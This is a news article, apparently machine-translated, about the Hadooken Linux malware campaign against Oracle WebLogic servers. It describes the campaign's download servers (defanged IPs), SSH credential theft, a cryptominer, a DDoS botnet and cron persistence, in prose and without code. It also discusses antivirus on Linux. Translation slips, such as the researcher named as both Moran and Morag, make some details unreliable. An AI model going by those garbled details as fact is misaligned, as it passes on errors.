Cybersecurity researchers have discovery a new malware campaign called Hadooken that targets Linux environments to conduct illicit cryptocurrency mining activities.
Hadooken and Cryptocurrency Theft
The attack, which specifically targets Oracle Weblogic server, is designed to distribute malware called Hadooken, according to cloud security firm Aqua.
“When Hadooken is executed, it releases a Tsunami malware and installs a cryptocurrency miner“, has declared security researcher Assaf Moran.
Attack chains exploit known security vulnerabilities and misconfigurations, as weak credentials, to gain a first point of entry and execute arbitrary code on vulnerable instances.
This is accomplished by launching two nearly identical payloads, one written in Python and the other, a shell script, both responsible for retrieving the Hadooken malware from a remote server (“89.185.85[.]102” or “185.174.136[.]204“).
“Additionally, the shell script version attempts to iterate over various directories containing SSH data (such as user credentials, host information, and secrets) and uses this information to attack known servers.“, said Morag who then added: “It then moves laterally within the organization or connected environments to further spread the Hadooken malware..“
Hadooken includes two components: a cryptocurrency miner and a Distributed Denial-of-Service (DDoS) attack botnet called Tsunami (also known as Kaiten), which has a history of various series of cyber attacks on Jenkins and Weblogic services deployed in Kubernetes clusters.
Additionally, the malware takes care of establishing persistence on the host by creating cronjob to periodically run the cryptocurrency miner at variable frequencies.
Aqua observed that the IP address 89.185.85[.]102 is registered in Germany under the hosting company Aeza International LTD (AS210644), with a relationship Uptycs’ previous exploit from February 2024 links it to a cryptocurrency campaign conducted by the 8220 group, exploiting vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center.
The second IP address 185.174.136[.]204, currently inactive, is also linked to Aeza Group Ltd. (AS216246); as highlighted by Qurium and EU DisinfoLab in July 2024, Aeza is a “bulletproof” hosting service provider with a presence in Moscow M9 and two data centers in Frankfurt.
“Aeza’s modus operandi and rapid growth can be explained by the recruitment of young developers affiliated with ‘bulletproof’ hosting providers in Russia that provide shelter for cybercrime.“, the researchers said in the report.
Yet Another Malware on Linux: Do You Need an Antivirus?
Yet another malware discovered on Linux, like Hadooken, reignites the debate on the actual need for an antivirus on this operating system; traditionally considered more secure than Windows, Linux has often been perceived as an environment less exposed to cyber threats.
However, the rise of targeted malware, especially in specific contexts such as servers and cloud environments, calls into question this “intrinsic” security and even if the adoption of an antivirus on Linux desktops remains uncommon, for servers and corporate infrastructures it can be an additional defensive barrier against increasingly sophisticated attacks, especially when it comes to protecting credentials and ensuring the continuity of services.
The most classic example being free and open source is ClamAVHowever It is very difficult to configure in real time for inexperienced usersthus limiting its diffusion in the domestic sphere or among those who do not have advanced technical skills.
Fun facts about the name Hadooken
The malware’s name “Hadooken” could be a curious reference to the famous special move from the video game Street Fighterknown as “Hadouken” and this move is performed by the character Ryu, which launches a powerful energy ball at its opponents; besides Ryu it is performed by Ken and Sakura.
The term itself is of Japanese origin and means “wave fist” (波動拳), referring to a rapid and devastating attack and this connection to the video game It may have been chosen to evoke the idea of an equally rapid and effective attack against the targeted systems.
#Hadooken #Linuxbased #malware #mines #cryptocurrencies